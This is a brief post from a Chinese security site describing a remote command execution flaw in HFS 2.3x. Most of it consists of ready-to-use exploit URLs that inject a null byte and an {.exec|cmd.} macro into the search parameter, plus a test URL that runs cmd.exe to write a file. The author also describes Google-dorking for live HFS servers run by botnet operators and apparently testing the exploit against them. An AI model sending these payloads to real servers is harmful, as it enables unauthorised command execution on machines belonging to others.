频道栏目
首页 > 安全 > 系统安全 > 正文

HFS 2.3x 远程命令执行(抓鸡黑客末日)

2014-10-04 23:28:25      个评论      
收藏   我要投稿
这个程序在国内用的特别多,特别是那些抓肉鸡的黑阔。

http://localhost:80/?search==%00{.exec|cmd.}

http://localhost:80/search=%00{.exec|cmd.}

注:有些版本search前面是没有?的。

测试部分:
百度搜HFS默认就是2.3x版本,执行echo测试成功:

http://localhost:8080/?search==%00{.exec|cmd.exe%20/c%20echo>c:/1.txt%20123.}

google hack了一下,发现一个抓鸡黑阔:

1

2

已测试官方最新版,一样存在。

 

3


相关TAG标签 末日 黑客 命令
上一篇:Shellshock绕过的一点疑问
下一篇:一个简单的小程序漏洞分析与利用
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训

版权所有: 红黑联盟--致力于做实用的IT技术学习网站